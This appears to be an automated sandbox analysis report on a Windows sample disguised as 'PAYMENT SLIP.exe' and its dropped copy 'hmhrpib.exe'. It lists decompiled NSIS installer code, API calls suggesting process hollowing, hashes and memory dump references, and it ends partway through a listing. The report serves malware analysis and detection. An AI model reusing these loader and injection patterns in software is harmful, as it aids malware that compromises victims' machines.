              • Associated: 00000001.00000002.665468957.000000000043B000.00000002.00020000.sdmp Download File
              Similarity
              • API ID: CharNext$AttributesFilelstrcpynlstrlen
              • String ID: P_B
              • API String ID: 3248276644-906794629
              • Opcode ID: 599bd04a1195b132cf6b260ce9cfa8fb39e22d36c0f4a850b99e9cc2c8b8c615
              • Instruction ID: 859fcd89679448da631e779a0da4808ed27405fda231041bc00783fb73730a7b
              • Opcode Fuzzy Hash: 599bd04a1195b132cf6b260ce9cfa8fb39e22d36c0f4a850b99e9cc2c8b8c615
              • Instruction Fuzzy Hash: 5DF0F925115D2325D722333A5D09AAF1544CF92358B49013FF895F22C1DA3C8A13CDBE
              Uniqueness

              Uniqueness Score: -1.00%

              Function 00405518, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 46windowCOMMON
              Download Yara Rule
              C-Code - Quality: 89%
              			E00405518(struct HWND__* _a4, int _a8, int _a12, long _a16) {
				int _t15;
				long _t16;

				_t15 = _a8;
				if(_t15 != 0x102) {
					if(_t15 != 0x200) {
						_t16 = _a16;
						L7:
						if(_t15 == 0x419 &&  *0x423734 != _t16) {
							_push(_t16);
							_push(6);
							 *0x423734 = _t16;
							E00404ECD();
						}
						L11:
						return CallWindowProcW( *0x42373c, _a4, _t15, _a12, _t16);
					}
					if(IsWindowVisible(_a4) == 0) {
						L10:
						_t16 = _a16;
						goto L11;
					}
					_t16 = E00404E4D(_a4, 1);
					_t15 = 0x419;
					goto L7;
				}
				if(_a12 != 0x20) {
					goto L10;
				}
				E004044DE(0x413);
				return 0;
			}





              0x0040551c
              0x00405526
              0x00405542
              0x00405564
              0x00405567
              0x0040556d
              0x00405577
              0x00405578
              0x0040557a
              0x00405580
              0x00405580
              0x0040558a
              0x00000000
              0x00405598
              0x0040554f
              0x00405587
              0x00405587
              0x00000000
              0x00405587
              0x0040555b
              0x0040555d
              0x00000000
              0x0040555d
              0x0040552c
              0x00000000
              0x00000000
              0x00405533
              0x00000000

              APIs
              • IsWindowVisible.USER32(?), ref: 00405547
              • CallWindowProcW.USER32(?,?,?,?), ref: 00405598
                • Part of subcall function 004044DE: SendMessageW.USER32(?,00000000,00000000,00000000), ref: 004044F0
              Strings
              Memory Dump Source
              • Source File: 00000001.00000002.665305559.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
              • Associated: 00000001.00000002.665292449.0000000000400000.00000002.00020000.sdmp Download File
              • Associated: 00000001.00000002.665364092.0000000000408000.00000002.00020000.sdmp Download File
              • Associated: 00000001.00000002.665378913.000000000040A000.00000004.00020000.sdmp Download File
              • Associated: 00000001.00000002.665383681.000000000040C000.00000004.00020000.sdmp Download File
              • Associated: 00000001.00000002.665411947.0000000000414000.00000004.00020000.sdmp Download File
              • Associated: 00000001.00000002.665438070.0000000000427000.00000004.00020000.sdmp Download File
              • Associated: 00000001.00000002.665452320.0000000000435000.00000004.00020000.sdmp Download File
              • Associated: 00000001.00000002.665456458.0000000000437000.00000004.00020000.sdmp Download File
              • Associated: 00000001.00000002.665468957.000000000043B000.00000002.00020000.sdmp Download File
              Similarity
              • API ID: Window$CallMessageProcSendVisible
              • String ID:
              • API String ID: 3748168415-3916222277
              • Opcode ID: e2a7228699b6e9b249c6dba5f8e9bb0c65ec33a27f8289b454cb53322165a19e
              • Instruction ID: 7ed895885fecbfe1028844bafe119d46ede1b6e58bfeef0b35ccd3d75cf6e938
              • Opcode Fuzzy Hash: e2a7228699b6e9b249c6dba5f8e9bb0c65ec33a27f8289b454cb53322165a19e
              • Instruction Fuzzy Hash: E60171B1200648BFDF208F11DD80A6B7726EB84755F244537FA007A1D4C77A8E529E59
              Uniqueness

              Uniqueness Score: -1.00%

              Function 0040640A, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 44registryCOMMON
              Download Yara Rule
              C-Code - Quality: 90%
              			E0040640A(void* __ecx, void* __eflags, intOrPtr _a4, int _a8, short* _a12, char* _a16, signed int _a20) {
				int _v8;
				long _t21;
				long _t24;
				char* _t30;

				asm("sbb eax, eax");
				_v8 = 0x800;
				_t21 = E004063A9(__eflags, _a4, _a8,  ~_a20 & 0x00000100 | 0x00020019,  &_a20);
				_t30 = _a16;
				if(_t21 != 0) {
					L4:
					 *_t30 =  *_t30 & 0x00000000;
				} else {
					_t24 = RegQueryValueExW(_a20, _a12, 0,  &_a8, _t30,  &_v8);
					_t21 = RegCloseKey(_a20);
					_t30[0x7fe] = _t30[0x7fe] & 0x00000000;
					if(_t24 != 0 || _a8 != 1 && _a8 != 2) {
						goto L4;
					}
				}
				return _t21;
			}







              0x00406418
              0x0040641a
              0x00406432
              0x00406437
              0x0040643c
              0x0040647a
              0x0040647a
              0x0040643e
              0x00406450
              0x0040645b
              0x00406461
              0x0040646c
              0x00000000
              0x00000000
              0x0040646c
              0x00406480

              APIs
              • RegQueryValueExW.ADVAPI32(?,?,00000000,00000000,?,00000800,00000002,00422728,00000000,?,?,KXCJDFJSKF,?,?,00406699,80000002), ref: 00406450
              • RegCloseKey.ADVAPI32(?,?,00406699,80000002,Software\Microsoft\Windows\CurrentVersion,KXCJDFJSKF,KXCJDFJSKF,KXCJDFJSKF,00000000,00422728), ref: 0040645B
              Strings
              Memory Dump Source
              • Source File: 00000001.00000002.665305559.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
              • Associated: 00000001.00000002.665292449.0000000000400000.00000002.00020000.sdmp Download File
              • Associated: 00000001.00000002.665364092.0000000000408000.00000002.00020000.sdmp Download File
              • Associated: 00000001.00000002.665378913.000000000040A000.00000004.00020000.sdmp Download File
              • Associated: 00000001.00000002.665383681.000000000040C000.00000004.00020000.sdmp Download File
              • Associated: 00000001.00000002.665411947.0000000000414000.00000004.00020000.sdmp Download File
              • Associated: 00000001.00000002.665438070.0000000000427000.00000004.00020000.sdmp Download File
              • Associated: 00000001.00000002.665452320.0000000000435000.00000004.00020000.sdmp Download File
              • Associated: 00000001.00000002.665456458.0000000000437000.00000004.00020000.sdmp Download File
              • Associated: 00000001.00000002.665468957.000000000043B000.00000002.00020000.sdmp Download File
              Similarity
              • API ID: CloseQueryValue
              • String ID: KXCJDFJSKF
              • API String ID: 3356406503-1579689790
              • Opcode ID: 5e421e957683aa7155fe1e1f393967b6404614e05e15b89e99e168e2dc4a01c3
              • Instruction ID: f0f89c662eeec8a22638327002db2d2d8046b3273e4fa87c0bc9f0af31e9764c
              • Opcode Fuzzy Hash: 5e421e957683aa7155fe1e1f393967b6404614e05e15b89e99e168e2dc4a01c3
              • Instruction Fuzzy Hash: E1017172510209EBDF218F51CC05FDB3BB8EB54354F01403AFD55A2190D738D964DB94
              Uniqueness

              Uniqueness Score: -1.00%

              Function 00405B25, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 24processCOMMON
              Download Yara Rule
              C-Code - Quality: 100%
              			E00405B25(WCHAR* _a4) {
				struct _PROCESS_INFORMATION _v20;
				int _t7;

				0x426750->cb = 0x44;
				_t7 = CreateProcessW(0, _a4, 0, 0, 0, 0x4000000, 0, 0, 0x426750,  &_v20);
				if(_t7 != 0) {
					CloseHandle(_v20.hThread);
					return _v20.hProcess;
				}
				return _t7;
			}





              0x00405b2e
              0x00405b4e
              0x00405b56
              0x00405b5b
              0x00000000
              0x00405b61
              0x00405b65

              APIs
              Strings
              • Error launching installer, xrefs: 00405B38
              Memory Dump Source
              • Source File: 00000001.00000002.665305559.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
              • Associated: 00000001.00000002.665292449.0000000000400000.00000002.00020000.sdmp Download File
              • Associated: 00000001.00000002.665364092.0000000000408000.00000002.00020000.sdmp Download File
              • Associated: 00000001.00000002.665378913.000000000040A000.00000004.00020000.sdmp Download File
              • Associated: 00000001.00000002.665383681.000000000040C000.00000004.00020000.sdmp Download File
              • Associated: 00000001.00000002.665411947.0000000000414000.00000004.00020000.sdmp Download File
              • Associated: 00000001.00000002.665438070.0000000000427000.00000004.00020000.sdmp Download File
              • Associated: 00000001.00000002.665452320.0000000000435000.00000004.00020000.sdmp Download File
              • Associated: 00000001.00000002.665456458.0000000000437000.00000004.00020000.sdmp Download File
              • Associated: 00000001.00000002.665468957.000000000043B000.00000002.00020000.sdmp Download File
              Similarity
              • API ID: CloseCreateHandleProcess
              • String ID: Error launching installer
              • API String ID: 3712363035-66219284
              • Opcode ID: ab61a979a714f7ec4effc1a78875f568a822f35fd178278bd28005db307d5d14
              • Instruction ID: 4727b597e06a80ccf73fde1317b74bfd1e446cf8a7cb79422ce9438d985acd26
              • Opcode Fuzzy Hash: ab61a979a714f7ec4effc1a78875f568a822f35fd178278bd28005db307d5d14
              • Instruction Fuzzy Hash: 2FE0B6B4A00209BFEB109B64ED49F7B7BBDEB04648F414465BD50F6190D778A8158A7C
              Uniqueness

              Uniqueness Score: -1.00%

              Function 00405F97, Relevance: 5.0, APIs: 4, Instructions: 37stringCOMMON
              Download Yara Rule
              C-Code - Quality: 100%
              			E00405F97(void* __ecx, CHAR* _a4, CHAR* _a8) {
				int _v8;
				int _t12;
				int _t14;
				int _t15;
				CHAR* _t17;
				CHAR* _t27;

				_t12 = lstrlenA(_a8);
				_t27 = _a4;
				_v8 = _t12;
				while(lstrlenA(_t27) >= _v8) {
					_t14 = _v8;
					 *(_t14 + _t27) =  *(_t14 + _t27) & 0x00000000;
					_t15 = lstrcmpiA(_t27, _a8);
					_t27[_v8] =  *(_t14 + _t27);
					if(_t15 == 0) {
						_t17 = _t27;
					} else {
						_t27 = CharNextA(_t27);
						continue;
					}
					L5:
					return _t17;
				}
				_t17 = 0;
				goto L5;
			}









              0x00405fa7
              0x00405fa9
              0x00405fac
              0x00405fd8
              0x00405fb1
              0x00405fba
              0x00405fbf
              0x00405fca
              0x00405fcd
              0x00405fe9
              0x00405fcf
              0x00405fd6
              0x00000000
              0x00405fd6
              0x00405fe2
              0x00405fe6
              0x00405fe6
              0x00405fe0
              0x00000000

              APIs
              • lstrlenA.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,0040627C,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405FA7
              • lstrcmpiA.KERNEL32(00000000,00000000,?,00000000,0040627C,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405FBF
              • CharNextA.USER32(00000000,?,00000000,0040627C,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405FD0
              • lstrlenA.KERNEL32(00000000,?,00000000,0040627C,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405FD9
              Memory Dump Source
              • Source File: 00000001.00000002.665305559.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
              • Associated: 00000001.00000002.665292449.0000000000400000.00000002.00020000.sdmp Download File
              • Associated: 00000001.00000002.665364092.0000000000408000.00000002.00020000.sdmp Download File
              • Associated: 00000001.00000002.665378913.000000000040A000.00000004.00020000.sdmp Download File
              • Associated: 00000001.00000002.665383681.000000000040C000.00000004.00020000.sdmp Download File
              • Associated: 00000001.00000002.665411947.0000000000414000.00000004.00020000.sdmp Download File
              • Associated: 00000001.00000002.665438070.0000000000427000.00000004.00020000.sdmp Download File
              • Associated: 00000001.00000002.665452320.0000000000435000.00000004.00020000.sdmp Download File
              • Associated: 00000001.00000002.665456458.0000000000437000.00000004.00020000.sdmp Download File
              • Associated: 00000001.00000002.665468957.000000000043B000.00000002.00020000.sdmp Download File
              Similarity
              • API ID: lstrlen$CharNextlstrcmpi
              • String ID:
              • API String ID: 190613189-0
              • Opcode ID: 4f145c51a58837bd7eda372618efc6ab74ada67201017ca859b4805a40dfc06b
              • Instruction ID: a453383ccec69260e8b6b46741f5159dab33bedf04c15e844a7af63cc501478c
              • Opcode Fuzzy Hash: 4f145c51a58837bd7eda372618efc6ab74ada67201017ca859b4805a40dfc06b
              • Instruction Fuzzy Hash: 02F06235105418EFD7029BA5DD40D9EBBA8DF06350B2540BAE840F7350D678DE01ABA9
              Uniqueness

              Uniqueness Score: -1.00%

              Analysis Process: PAYMENT SLIP.exe PID: 7116 Parent PID: 6804 PAYMENT SLIP.exeCOMMON

              Executed Functions

              Function 03051450, Relevance: 14.5, APIs: 7, Strings: 1, Instructions: 461memoryfileCOMMON
              Download Yara Rule
              APIs
                • Part of subcall function 0305126A: Sleep.KERNELBASE(?,?,034CF0BF), ref: 0305128F
              • VirtualAlloc.KERNELBASE(00000000,1C200000,00003000,00000004,?,050A26AF,00000000), ref: 030518E7
              • CreateFileW.KERNELBASE(?,80000000,00000007,00000000,00000003,00000080,00000000), ref: 03051960
              Strings
              Memory Dump Source
              • Source File: 00000006.00000002.693754999.0000000003050000.00000040.00000001.sdmp, Offset: 03050000, based on PE: false
              Similarity
              • API ID: AllocCreateFileSleepVirtual
              • String ID: 912b4404d7d84462b22a6b7539dd3e97
              • API String ID: 3031228858-2352350902
              • Opcode ID: 9836bb2fa113f8532c703a36e22e53b5fb9b0defa331fff036c345c23b29506d
              • Instruction ID: c18e78c065479a359cf65b108b520bb83b972a7254590eb8aeb425a88841cbae
              • Opcode Fuzzy Hash: 9836bb2fa113f8532c703a36e22e53b5fb9b0defa331fff036c345c23b29506d
              • Instruction Fuzzy Hash: 60026E25E54398E9EF61CBE4EC05BEDB7B5AF44B10F10448AEA08FE1D1D3B50A84DB16
              Uniqueness

              Uniqueness Score: -1.00%

              Function 03050950, Relevance: 10.7, APIs: 7, Instructions: 237fileCOMMON
              Download Yara Rule
              APIs
              • CreateFileW.KERNELBASE(00000000,?,80000000,00000007,00000000,00000003,00000080,00000000,00000000,55E38B1F,00000000,050A26AF,00000000,D6EB2188,00000000,433A3842), ref: 03050A52
              • VirtualFree.KERNELBASE(00000000,00000000,00008000,00000000,00000000,00000000,00000000,?), ref: 03050C1F
              Memory Dump Source
              • Source File: 00000006.00000002.693754999.0000000003050000.00000040.00000001.sdmp, Offset: 03050000, based on PE: false
              Similarity
              • API ID: CreateFileFreeVirtual
              • String ID:
              • API String ID: 204039940-0
              • Opcode ID: 2896953df3b337a7edc239ec9e3748cbe23ec4b89491ad47033057de49a05fab
              • Instruction ID: ca06f2455a13a6e2623d24839d020b9b5991afe30f343d863547a9773fe318cb
              • Opcode Fuzzy Hash: 2896953df3b337a7edc239ec9e3748cbe23ec4b89491ad47033057de49a05fab
              • Instruction Fuzzy Hash: A2A1F334D02209EFEF50DFE4C985BEEBBB5BF08319F208895E911BA2A0D3755A51DB14
              Uniqueness

              Uniqueness Score: -1.00%

              Function 03051A70, Relevance: 9.1, APIs: 6, Instructions: 118fileCOMMON
              Download Yara Rule
              APIs
                • Part of subcall function 03051BDE: GetFileAttributesW.KERNELBASE(000000FF,00000000,8A5B2944,?,00000000,000000FF,1C200000), ref: 03051BFF
              • CreateFileW.KERNELBASE(000000FF,80000000,00000007,00000000,00000003,00000080,00000000,00000000,000000FF,7F896FF1,000000FF,D6EB2188,000000FF,433A3842,000000FF,A5F15738), ref: 03051B25
              Memory Dump Source
              • Source File: 00000006.00000002.693754999.0000000003050000.00000040.00000001.sdmp, Offset: 03050000, based on PE: false
              Similarity
              • API ID: File$AttributesCreate
              • String ID:
              • API String ID: 415043291-0
              • Opcode ID: 13c43d67a1bd41c791ffee7eecdbab20b06a7b62dbc9f074a5a54340b611209a
              • Instruction ID: ecd8eb4e03e99d5960782783564637d192464969bf2cb627a26ebae6722a1145
              • Opcode Fuzzy Hash: 13c43d67a1bd41c791ffee7eecdbab20b06a7b62dbc9f074a5a54340b611209a
              • Instruction Fuzzy Hash: 7041DF74D42209FEEF15EBA0CD05BEEBAB9EF14312F1048A5FA11B91A0E7754A51EB10
              Uniqueness

              Uniqueness Score: -1.00%

              Function 03050034, Relevance: 6.7, APIs: 4, Instructions: 727processthreadCOMMON
              Download Yara Rule
              APIs
              • CreateProcessW.KERNELBASE(?,00000000), ref: 030505BE
              • GetThreadContext.KERNELBASE(?,00010007), ref: 030505E1
              • ReadProcessMemory.KERNELBASE(?,?,?,00000004,00000000), ref: 03050605
              • TerminateProcess.KERNELBASE(00000000,00000000,?), ref: 0305091F
              Memory Dump Source
              • Source File: 00000006.00000002.693754999.0000000003050000.00000040.00000001.sdmp, Offset: 03050000, based on PE: false
              Similarity
              • API ID: Process$ContextCreateMemoryReadTerminateThread
              • String ID:
              • API String ID: 3842210937-0
              • Opcode ID: 7ccdf02250a7f57193278edde130f34dbf23f9f58fec9f604b246064b05aa7b6
              • Instruction ID: c5cb32b3d47d66ea58c715c488cb419230e5f5946d324a49cbe6186d6a536f8f
              • Opcode Fuzzy Hash: 7ccdf02250a7f57193278edde130f34dbf23f9f58fec9f604b246064b05aa7b6
              • Instruction Fuzzy Hash: 30521E35E51358EEEB60CBA4EC55BFEB7B5AF44710F20549AEA08EA1A0D3705E80DF05
              Uniqueness

              Uniqueness Score: -1.00%

              Function 03051BDE, Relevance: 1.5, APIs: 1, Instructions: 24COMMON
              Download Yara Rule
              APIs
              • GetFileAttributesW.KERNELBASE(000000FF,00000000,8A5B2944,?,00000000,000000FF,1C200000), ref: 03051BFF
              Memory Dump Source
              • Source File: 00000006.00000002.693754999.0000000003050000.00000040.00000001.sdmp, Offset: 03050000, based on PE: false
              Similarity
              • API ID: AttributesFile
              • String ID:
              • API String ID: 3188754299-0
              • Opcode ID: b7bda0b8c07b5c02538c4b90ace2375a0725cce56a20283952b39a7187ab7334
              • Instruction ID: 78741cac309ef26915e06c777a6c56697654d140138def528c9dd8ef58df2b6b
              • Opcode Fuzzy Hash: b7bda0b8c07b5c02538c4b90ace2375a0725cce56a20283952b39a7187ab7334
              • Instruction Fuzzy Hash: 60F01C75C0120CFFDF04EFA8C8096AEBFB4EF00311F144AA5E82067291D7314AA1DB44
              Uniqueness

              Uniqueness Score: -1.00%

              Function 0305126A, Relevance: 1.3, APIs: 1, Instructions: 16sleepCOMMON
              Download Yara Rule
              APIs
              • Sleep.KERNELBASE(?,?,034CF0BF), ref: 0305128F
              Memory Dump Source
              • Source File: 00000006.00000002.693754999.0000000003050000.00000040.00000001.sdmp, Offset: 03050000, based on PE: false
              Similarity
              • API ID: Sleep
              • String ID:
              • API String ID: 3472027048-0
              • Opcode ID: 995ef871e1a5def57f6e13ec2e7b1f3b75d42bd7157b0b3a82b0e07460e609ee
              • Instruction ID: 4c72bef9330216431e4fe62387a46aa0ae890da15b6432787964ff0caa7ad40b
              • Opcode Fuzzy Hash: 995ef871e1a5def57f6e13ec2e7b1f3b75d42bd7157b0b3a82b0e07460e609ee
              • Instruction Fuzzy Hash: ABD05EB5C5130CBFCB04EFE0CC4689EBF7CDF51201F10859ABC006B100DA759B109A94
              Uniqueness

              Uniqueness Score: -1.00%

              Non-executed Functions

              Analysis Process: hmhrpib.exe PID: 6024 Parent PID: 3424 hmhrpib.exeCOMMON

              Executed Functions

              Function 004035D8, Relevance: 87.9, APIs: 32, Strings: 18, Instructions: 410stringfilecomCOMMON
              Download Yara Rule
              C-Code - Quality: 81%
              			_entry_() {
				signed int _t51;
				intOrPtr* _t56;
				WCHAR* _t60;
				char* _t62;
				void* _t65;
				void* _t67;
				int _t69;
				int _t71;
				int _t74;
				intOrPtr* _t75;
				int _t76;
				int _t78;
				void* _t102;
				signed int _t119;
				void* _t122;
				void* _t127;
				intOrPtr _t146;
				intOrPtr _t147;
				intOrPtr* _t148;
				int _t150;
				void* _t153;
				int _t154;
				signed int _t158;
				signed int _t163;
				signed int _t168;
				void* _t170;
				void* _t172;
				int* _t174;
				signed int _t180;
				signed int _t183;
				CHAR* _t184;
				WCHAR* _t185;
				void* _t191;
				char* _t192;
				void* _t195;
				void* _t196;
				void* _t242;

				_t170 = 0x20;
				_t150 = 0;
				 *(_t196 + 0x14) = 0;
				 *(_t196 + 0x10) = L"Error writing temporary file. Make sure your temp folder is valid.";
				 *(_t196 + 0x1c) = 0;
				SetErrorMode(0x8001); // executed
				_t51 = GetVersion() & 0xbfffffff;
				 *0x42a26c = _t51;
				if(_t51 != 6) {
					_t148 = E00406931(0);
					if(_t148 != 0) {
						 *_t148(0xc00);
					}
				}
				_t184 = "UXTHEME";
				goto L4;
				L8:
				__imp__#17(_t191);
				__imp__OleInitialize(_t150); // executed
				 *0x42a338 = _t56;
				SHGetFileInfoW(0x421708, _t150, _t196 + 0x34, 0x2b4, _t150); // executed
				E0040653C(0x429260, L"NSIS Error");
				_t60 = GetCommandLineW();
				_t192 = L"\"C:\\Users\\jones\\AppData\\Roaming\\tteegmiuoefs\\hmhrpib.exe\" ";
				E0040653C(_t192, _t60);
				 *0x42a260 = 0x400000;
				_t62 = _t192;
				if(L"\"C:\\Users\\jones\\AppData\\Roaming\\tteegmiuoefs\\hmhrpib.exe\" " == 0x22) {
					_t62 =  &M00435002;
					_t170 = 0x22;
				}
				_t154 = CharNextW(E00405E3E(_t62, _t170));
				 *(_t196 + 0x18) = _t154;
				_t65 =  *_t154;
				if(_t65 == _t150) {
					L33:
					_t185 = L"C:\\Users\\jones\\AppData\\Local\\Temp\\";
					GetTempPathW(0x400, _t185);
					_t67 = E004035A7(_t154, 0);
					_t224 = _t67;
					if(_t67 != 0) {
						L36:
						DeleteFileW(L"1033"); // executed
						_t69 = E00403068(_t226,  *(_t196 + 0x1c)); // executed
						 *(_t196 + 0x10) = _t69;
						if(_t69 != _t150) {
							L48:
							E00403B19();
							__imp__OleUninitialize();
							_t238 =  *(_t196 + 0x10) - _t150;
							if( *(_t196 + 0x10) == _t150) {
								__eflags =  *0x42a314 - _t150;
								if( *0x42a314 == _t150) {
									L72:
									_t71 =  *0x42a32c;
									__eflags = _t71 - 0xffffffff;
									if(_t71 != 0xffffffff) {
										 *(_t196 + 0x10) = _t71;
									}
									ExitProcess( *(_t196 + 0x10));
								}
								_t74 = OpenProcessToken(GetCurrentProcess(), 0x28, _t196 + 0x14);
								__eflags = _t74;
								if(_t74 != 0) {
									LookupPrivilegeValueW(_t150, L"SeShutdownPrivilege", _t196 + 0x20);
									 *(_t196 + 0x34) = 1;
									 *(_t196 + 0x40) = 2;
									AdjustTokenPrivileges( *(_t196 + 0x28), _t150, _t196 + 0x24, _t150, _t150, _t150);
								}
								_t75 = E00406931(4);
								__eflags = _t75 - _t150;
								if(_t75 == _t150) {
									L70:
									_t76 = ExitWindowsEx(2, 0x80040002);
									__eflags = _t76;
									if(_t76 != 0) {
										goto L72;
									}
									goto L71;
								} else {
									_t78 =  *_t75(_t150, _t150, _t150, 0x25, 0x80040002);
									__eflags = _t78;
									if(_t78 == 0) {
										L71:
										E0040140B(9);
										goto L72;
									}
									goto L70;
								}
							}
							E00405BA2( *(_t196 + 0x10), 0x200010);
							ExitProcess(2);
						}
						if( *0x42a280 == _t150) {
							L47:
							 *0x42a32c =  *0x42a32c | 0xffffffff;
							 *(_t196 + 0x14) = E00403C0B( *0x42a32c);
							goto L48;
						}
						_t174 = E00405E3E(_t192, _t150);
						if(_t174 < _t192) {
							L44:
							_t235 = _t174 - _t192;
							 *(_t196 + 0x10) = L"Error launching installer";
							if(_t174 < _t192) {
								_t172 = E00405B0D(_t238);
								lstrcatW(_t185, L"~nsu");
								if(_t172 != _t150) {
									lstrcatW(_t185, "A");
								}
								lstrcatW(_t185, L".tmp");
								_t194 = L"C:\\Users\\jones\\AppData\\Roaming\\tteegmiuoefs";
								if(lstrcmpiW(_t185, L"C:\\Users\\jones\\AppData\\Roaming\\tteegmiuoefs") != 0) {
									_push(_t185);
									if(_t172 == _t150) {
										E00405AF0();
									} else {
										E00405A73();
									}
									SetCurrentDirectoryW(_t185);
									_t242 = L"C:\\Users\\jones\\AppData\\Local\\Temp" - _t150; // 0x43
									if(_t242 == 0) {
										E0040653C(L"C:\\Users\\jones\\AppData\\Local\\Temp", _t194);
									}
									E0040653C(0x42b000,  *(_t196 + 0x18));
									_t155 = "A" & 0x0000ffff;
									 *0x42b800 = ( *0x40a316 & 0x0000ffff) << 0x00000010 | "A" & 0x0000ffff;
									_t195 = 0x1a;
									do {
										E00406579(_t150, 0x420f08, _t185, 0x420f08,  *((intOrPtr*)( *0x42a274 + 0x120)));
										DeleteFileW(0x420f08);
										if( *(_t196 + 0x10) != _t150 && CopyFileW(L"C:\\Users\\jones\\AppData\\Roaming\\tteegmiuoefs\\hmhrpib.exe", 0x420f08, 1) != 0) {
											E00406302(_t155, 0x420f08, _t150);
											E00406579(_t150, 0x420f08, _t185, 0x420f08,  *((intOrPtr*)( *0x42a274 + 0x124)));
											_t102 = E00405B25(0x420f08);
											if(_t102 != _t150) {
												CloseHandle(_t102);
												 *(_t196 + 0x10) = _t150;
											}
										}
										 *0x42b800 =  *0x42b800 + 1;
										_t195 = _t195 - 1;
									} while (_t195 != 0);
									E00406302(_t155, _t185, _t150);
								}
								goto L48;
							}
							 *_t174 = _t150;
							_t175 =  &(_t174[2]);
							if(E00405F19(_t235,  &(_t174[2])) == 0) {
								goto L48;
							}
							E0040653C(L"C:\\Users\\jones\\AppData\\Local\\Temp", _t175);
							E0040653C(L"C:\\Users\\jones\\AppData\\Local\\Temp", _t175);
							 *(_t196 + 0x10) = _t150;
							goto L47;
						}
						asm("cdq");
						asm("cdq");
						asm("cdq");
						_t158 = ( *0x40a33a & 0x0000ffff) << 0x00000010 | L" _?=" & 0x0000ffff;
						_t119 = ( *0x40a33e & 0x0000ffff) << 0x00000010 |  *0x40a33c & 0x0000ffff | (_t163 << 0x00000020 |  *0x40a33e & 0x0000ffff) << 0x10;
						while( *_t174 != _t158 || _t174[1] != _t119) {
							_t174 = _t174;
							if(_t174 >= _t192) {
								continue;
							}
							break;
						}
						_t150 = 0;
						goto L44;
					}
					GetWindowsDirectoryW(_t185, 0x3fb);
					lstrcatW(_t185, L"\\Temp");
					_t122 = E004035A7(_t154, _t224);
					_t225 = _t122;
					if(_t122 != 0) {
						goto L36;
					}
					GetTempPathW(0x3fc, _t185);
					lstrcatW(_t185, L"Low");
					SetEnvironmentVariableW(L"TEMP", _t185);
					SetEnvironmentVariableW(L"TMP", _t185);
					_t127 = E004035A7(_t154, _t225);
					_t226 = _t127;
					if(_t127 == 0) {
						goto L48;
					}
					goto L36;
				} else {
					do {
						_t153 = 0x20;
						if(_t65 != _t153) {
							L13:
							if( *_t154 == 0x22) {
								_t154 = _t154 + 2;
								_t153 = 0x22;
							}
							if( *_t154 != 0x2f) {
								goto L27;
							} else {
								_t154 = _t154 + 2;
								if( *_t154 == 0x53) {
									_t147 =  *((intOrPtr*)(_t154 + 2));
									if(_t147 == 0x20 || _t147 == 0) {
										 *0x42a320 = 1;
									}
								}
								asm("cdq");
								asm("cdq");
								_t168 = L"NCRC" & 0x0000ffff;
								asm("cdq");
								_t180 = ( *0x40a37e & 0x0000ffff) << 0x00000010 |  *0x40a37c & 0x0000ffff | _t168;
								if( *_t154 == (( *0x40a37a & 0x0000ffff) << 0x00000010 | _t168) &&  *((intOrPtr*)(_t154 + 4)) == _t180) {
									_t146 =  *((intOrPtr*)(_t154 + 8));
									if(_t146 == 0x20 || _t146 == 0) {
										 *(_t196 + 0x1c) =  *(_t196 + 0x1c) | 0x00000004;
									}
								}
								asm("cdq");
								asm("cdq");
								_t163 = L" /D=" & 0x0000ffff;
								asm("cdq");
								_t183 = ( *0x40a372 & 0x0000ffff) << 0x00000010 |  *0x40a370 & 0x0000ffff | _t163;
								if( *(_t154 - 4) != (( *0x40a36e & 0x0000ffff) << 0x00000010 | _t163) ||  *_t154 != _t183) {
									goto L27;
								} else {
									 *(_t154 - 4) =  *(_t154 - 4) & 0x00000000;
									__eflags = _t154;
									E0040653C(L"C:\\Users\\jones\\AppData\\Local\\Temp", _t154);
									L32:
									_t150 = 0;
									goto L33;
								}
							}
						} else {
							goto L12;
						}
						do {
							L12:
							_t154 = _t154 + 2;
						} while ( *_t154 == _t153);
						goto L13;
						L27:
						_t154 = E00405E3E(_t154, _t153);
						if( *_t154 == 0x22) {
							_t154 = _t154 + 2;
						}
						_t65 =  *_t154;
					} while (_t65 != 0);
					goto L32;
				}
				L4:
				E004068C1(_t184); // executed
				_t184 =  &(_t184[lstrlenA(_t184) + 1]);
				if( *_t184 != 0) {
					goto L4;
				} else {
					E00406931(0xb);
					 *0x42a264 = E00406931(9);
					_t56 = E00406931(7);
					if(_t56 != _t150) {
						_t56 =  *_t56(0x1e);
						if(_t56 != 0) {
							 *0x42a26f =  *0x42a26f | 0x00000040;
						}
					}
					goto L8;
				}
			}








































              0x004035e3
              0x004035e4
              0x004035eb
              0x004035ef
              0x004035f7
              0x004035fb
              0x00403607
              0x00403610
              0x00403615
              0x00403618
              0x0040361f
              0x00403626
              0x00403626
              0x0040361f
              0x00403628
              0x00403628
              0x00403670
              0x00403671
              0x00403678
              0x0040367e
              0x00403694
              0x004036a4
              0x004036a9
              0x004036af
              0x004036b6
              0x004036c3
              0x004036cd
              0x004036cf
              0x004036d3
              0x004036d8
              0x004036d8
              0x004036e7
              0x004036e9
              0x004036ed
              0x004036f3
              0x0040380a
              0x00403810
              0x0040381b
              0x0040381d
              0x00403822
              0x00403824
              0x0040387c
              0x00403881
              0x0040388b
              0x00403892
              0x00403896
              0x00403947
              0x00403947
              0x0040394c
              0x00403952
              0x00403957
              0x00403a7d
              0x00403a83
              0x00403b01
              0x00403b01
              0x00403b06
              0x00403b09
              0x00403b0b
              0x00403b0b
              0x00403b13
              0x00403b13
              0x00403a93
              0x00403a99
              0x00403a9b
              0x00403aa8
              0x00403abb
              0x00403ac3
              0x00403acb
              0x00403acb
              0x00403ad3
              0x00403ad8
              0x00403adf
              0x00403aed
              0x00403af0
              0x00403af6
              0x00403af8
              0x00000000
              0x00000000
              0x00000000
              0x00403ae1
              0x00403ae7
              0x00403ae9
              0x00403aeb
              0x00403afa
              0x00403afc
              0x00000000
              0x00403afc
              0x00000000
              0x00403aeb
              0x00403adf
